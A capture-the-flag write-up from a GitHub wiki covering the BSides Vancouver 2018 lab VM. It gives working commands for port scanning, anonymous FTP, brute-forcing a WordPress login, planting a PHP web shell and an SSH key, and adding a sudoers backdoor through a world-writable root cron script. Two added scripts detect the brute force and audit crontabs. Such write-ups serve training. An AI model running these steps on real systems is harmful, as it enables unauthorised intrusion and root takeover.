vancouver - danielcastropalomares/security GitHub Wiki
A first scan shows that FTP, SSH and HTTP are open:
root@kali:~# nmap -p- 172.31.255.120
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 23:07 CET
Nmap scan report for 172.31.255.120
Host is up (0.000076s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.62 seconds
root@kali:/tmp# nmap -A 172.31.255.120
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 23:07 CET
Nmap scan report for 172.31.255.120
Host is up (0.00067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.31.255.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 172.31.255.120
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds
Over FTP we find a file named users.txt.bk:
root@kali:/tmp# ftp 172.31.255.120
Connected to 172.31.255.120.
220 (vsFTPd 2.3.5)
Name (172.31.255.120:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
226 Directory send OK.
ftp> dir public
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk
226 Directory send OK.
ftp>
We download the file:
ftp> cd public
250 Directory successfully changed.
ftp> get users.txt.bk
local: users.txt.bk remote: users.txt.bk
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for users.txt.bk (31 bytes).
226 Transfer complete.
31 bytes received in 0.00 secs (7.0600 kB/s)
ftp>
The file appears to contain a list of usernames:
root@kali:/tmp# cat users.txt.bk
abatchy
john
mai
anne
doomguy
We enumerate the live directories on the web server (robots.txt already pointed at /backup_wordpress):
[23:35:13] 200 - 19KB - /backup_wordpress/license.txt
[23:35:15] 200 - 7KB - /backup_wordpress/readme
[23:35:15] 200 - 7KB - /backup_wordpress/readme.html
[23:35:16] 301 - 0B - /backup_wordpress/index -> http://172.31.255.120/backup_wordpress/index/
[23:35:16] 301 - 0B - /backup_wordpress/index.php/login/ -> http://172.31.255.120/backup_wordpress/login/
[23:35:16] 301 - 0B - /backup_wordpress/index.php -> http://172.31.255.120/backup_wordpress/
[23:35:17] 301 - 336B - /backup_wordpress/wp-admin -> http://172.31.255.120/backup_wordpress/wp-admin/
[23:35:17] 301 - 338B - /backup_wordpress/wp-content -> http://172.31.255.120/backup_wordpress/wp-content/
[23:35:17] 200 - 69B - /backup_wordpress/wp-content/plugins/akismet/akismet.php
[23:35:17] 200 - 0B - /backup_wordpress/wp-content/
[23:35:17] 301 - 339B - /backup_wordpress/wp-includes -> http://172.31.255.120/backup_wordpress/wp-includes/
[23:35:17] 500 - 0B - /backup_wordpress/wp-includes/rss-functions.php
[23:35:17] 200 - 34KB - /backup_wordpress/wp-includes/
[23:35:22] 200 - 0B - /backup_wordpress/wp-config.php
[23:35:22] 200 - 2KB - /backup_wordpress/wp-login/
[23:35:22] 200 - 2KB - /backup_wordpress/wp-login.php
[23:35:22] 200 - 2KB - /backup_wordpress/wp-login
[23:35:22] 500 - 3KB - /backup_wordpress/wp-admin/setup-config.php
[23:35:22] 302 - 0B - /backup_wordpress/wp-admin/ -> /backup_wordpress/wp-login.php?redirect_to=http%3A%2F%2F172.31.255.120%2Fbackup_wordpress%2Fwp-admin%2F&reauth=1
[23:35:22] 200 - 1KB - /backup_wordpress/wp-admin/install.php
[23:35:22] 405 - 42B - /backup_wordpress/xmlrpc.php
On the WordPress login page we can check the usernames found earlier. With the users john and admin we get the following message:
ERROR: The password field is empty.
Using nmap's brute-force script with the rockyou wordlist, we find john's password:
root@kali:/tmp# cat users100
john
root@kali:/tmp# nmap -p 80 --script http-wordpress-brute --script-args 'userdb=/tmp/users100,passdb=/tmp/rockyou.txt,http-wordpress-brute.uri=/backup_wordpress/wp-login.php,brute.firstonly=true' 172.31.255.120
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 23:53 CET
Nmap scan report for 172.31.255.120
Host is up (0.00043s latency).
PORT STATE SERVICE
80/tcp open http
| http-wordpress-brute:
| Accounts:
| john:enigma - Valid credentials
|_ Statistics: Performed 2519 guesses in 321 seconds, average tps: 8.4
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 336.35 seconds
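The brute-force run above produced 2519 POSTs to wp-login.php from one address in 321 seconds, which is easy to spot in an Apache access log. The following detector is an added example, not part of the original write-up; it assumes the log is in Apache combined format and uses a constructed sample log.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag source IPs that POST
# to wp-login.php at least THRESHOLD times within a single minute. This is
# what the nmap http-wordpress-brute run looks like in an Apache access log.

# wp_login_bursts LOG [THRESHOLD]
# Prints "IP dd/Mon/yyyy:HH:MM count" for every (IP, minute) pair with at
# least THRESHOLD POSTs to wp-login.php. LOG is in Apache combined format.
wp_login_bursts() {
    log=$1
    threshold=${2:-10}
    awk -v t="$threshold" '
        # $1 = client IP, $4 = "[dd/Mon/yyyy:HH:MM:SS", $6 = "\"METHOD", $7 = path
        $6 == "\"POST" && $7 ~ /wp-login\.php/ {
            minute = substr($4, 2, 17)       # strip the "[" and the seconds
            hits[$1 " " minute]++
        }
        END { for (k in hits) if (hits[k] >= t) print k, hits[k] }
    ' "$log" | sort
}

# demo_bursts: constructed access log with one brute-force burst from
# 172.31.255.129 (12 POSTs in one minute), a GET from the same host and a
# single POST from another address; run the detector with threshold 10.
demo_bursts() {
    log=$(mktemp)
    i=0
    while [ "$i" -lt 12 ]; do
        printf '172.31.255.129 - - [18/Dec/2018:23:53:%02d +0100] "POST /backup_wordpress/wp-login.php HTTP/1.1" 200 2462 "-" "Mozilla/5.0"\n' "$i" >> "$log"
        i=$((i + 1))
    done
    printf '172.31.255.129 - - [18/Dec/2018:23:53:30 +0100] "GET /backup_wordpress/wp-login.php HTTP/1.1" 200 2462 "-" "Mozilla/5.0"\n' >> "$log"
    printf '10.0.0.7 - - [18/Dec/2018:23:54:01 +0100] "POST /backup_wordpress/wp-login.php HTTP/1.1" 200 2462 "-" "Mozilla/5.0"\n' >> "$log"
    wp_login_bursts "$log" 10
    rm -f "$log"
}

demo_bursts
```

On this VM the root cron job /usr/local/bin/cleanup wipes /var/log/apache2/* every minute, so a check like this only works if the access log is shipped off the host as it is written.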
We scan the WordPress install with wpscan and see that it is a very old version:
root@kali:~# wpscan --url http://172.31.255.120/backup_wordpress
[+] WordPress version 4.5 identified (Insecure, released on 2016-04-12).
Now we log in with the credentials found earlier and edit the following theme file to upload a PHP shell; in my case I used this one:
https://github.com/flozz/p0wny-shell
Appearance > Editor > 404.php
Once the file has been edited, we browse to the corresponding URL:
http://172.31.255.120/backup_wordpress/wp-content/themes/twentysixteen/404.php
Once inside, we confirm which user we are running as and where its home directory is:
p0wny@shell:…/www/.ssh# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
p0wny@shell:…/www/# cat /etc/passwd | grep www-data
www-data:x:33:33:www-data:/var/www:/bin/sh
Now we copy our public key into place so we can connect over SSH:
p0wny@shell:/var/www# mkdir .ssh
p0wny@shell:…/www/.ssh# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCbzg2USqeSVUbyUxDlMRa2q0Rdt0qTexnKC0uklMrjJRHLIAyII76fzKL0xHnD3QOWUMN3dDecINLt+zv77NvsCVP+IyFaEw9GGQyyOAsvi28xI7JC+LZRVK0JNSIF8+XagmBx8JeCkpeYcnNwoh1Rovoc149tbzMPPSfe6dOEgQ== root@kali" > authorized_keys
Now we can log in over SSH:
root@kali:/tmp# ssh -i test2 www-data@172.31.255.120
The authenticity of host '172.31.255.120 (172.31.255.120)' can't be established.
ECDSA key fingerprint is SHA256:FhT9tr50Ps28yBw38pBWN+YEx5wCU/d8o1Ih22W4fyQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.31.255.120' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
382 packages can be updated.
275 updates are security updates.
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ /bin/bash
www-data@bsides2018:~$
We look for files with the SUID bit set and find nothing interesting:
www-data@bsides2018:~$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ping
/bin/mount
/bin/su
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/at
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/lppasswd
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/X
/usr/bin/pkexec
/usr/sbin/uuidd
/usr/sbin/pppd
In cron we see the following:
www-data@bsides2018:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /usr/local/bin/cleanup
#
We locate the cleanup script and see that it is world-writable:
www-data@bsides2018:~$ cat /usr/local/bin/cleanup
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
www-data@bsides2018:~$ ls -liath /usr/local/bin/cleanup
37657 -rwxrwxrwx 1 root root 64 Mar 3 2018 /usr/local/bin/cleanup
We modify the script so that sudo no longer asks www-data for a password:
www-data@bsides2018:~$ cat /usr/local/bin/cleanup
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
echo "www-data ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/www-data
chmod 0440 /etc/sudoers.d/www-data
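The root cause here is a root cron job pointing at a file any user can edit. The following audit is an added example, not part of the original write-up: it walks a crontab in /etc/crontab syntax (five time fields, user, command) and reports root jobs whose program, or the directory holding it, can be modified by someone other than the expected owner. The fixtures it builds are constructed.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a system crontab for
# root jobs whose program (or its parent directory) can be modified by someone
# other than the expected owner. Here it would flag /usr/local/bin/cleanup
# (mode 0777, run as root every minute). Assumes /etc/crontab syntax.
# writable_by_others PATH OWNER: succeeds if PATH is not owned by OWNER or
# has the group or other write bit set (ls mode string positions 6 and 9).
writable_by_others() {
    mode=$(ls -ld "$1" | cut -c1-10)          # drop any ACL/SELinux suffix
    own=$(ls -ld "$1" | awk '{print $3}')
    [ "$own" != "$2" ] && return 0
    case $mode in ?????w????|????????w?) return 0 ;; esac
    return 1
}

# audit_crontab FILE [OWNER]: print one line per root job whose program is
# writable or replaceable. Commands that do not start with an absolute path
# ("cd / && run-parts ...") are skipped; /etc/cron.* scripts need another pass.
audit_crontab() {
    owner=${2:-root}
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    while read -r _min _hour _dom _mon _dow user cmd; do
        [ "$user" = root ] || continue
        prog=$(printf '%s' "$cmd" | awk '{print $1}')
        case $prog in /*) [ -e "$prog" ] || continue ;; *) continue ;; esac
        if writable_by_others "$prog" "$owner"; then
            echo "WRITABLE $prog"
        elif writable_by_others "$(dirname "$prog")" "$owner"; then
            echo "REPLACEABLE $prog (parent directory writable)"
        fi
    done
}

# demo_audit: constructed fixtures mirroring the write-up's crontab. Runs
# unprivileged, so the current user stands in for root as the trusted owner.
demo_audit() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\nrm -rf /var/log/apache2/*\n' > "$tmp/cleanup" && chmod 777 "$tmp/cleanup"
    printf '#!/bin/sh\necho ok\n' > "$tmp/safe" && chmod 755 "$tmp/safe"
    cat > "$tmp/crontab" <<EOF
SHELL=/bin/sh
* * * * * root $tmp/cleanup
* * * * * root $tmp/safe
* * * * * www-data $tmp/cleanup
EOF
    audit_crontab "$tmp/crontab" "$(id -un)"
    rm -rf "$tmp"
}

demo_audit
```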
Now, logging in over SSH again:
root@kali:/tmp# ssh -i test2 www-data@172.31.255.120
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
382 packages can be updated.
275 updates are security updates.
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Dec 18 16:37:11 2018 from 172.31.255.129
$ /bin/bash
www-data@bsides2018:~$ sudo su
root@bsides2018:/var/www#
Now we can reach root's home directory and read the flag:
root@bsides2018:~# cat flag.txt
Congratulations!
If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!
There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?
@abatchy17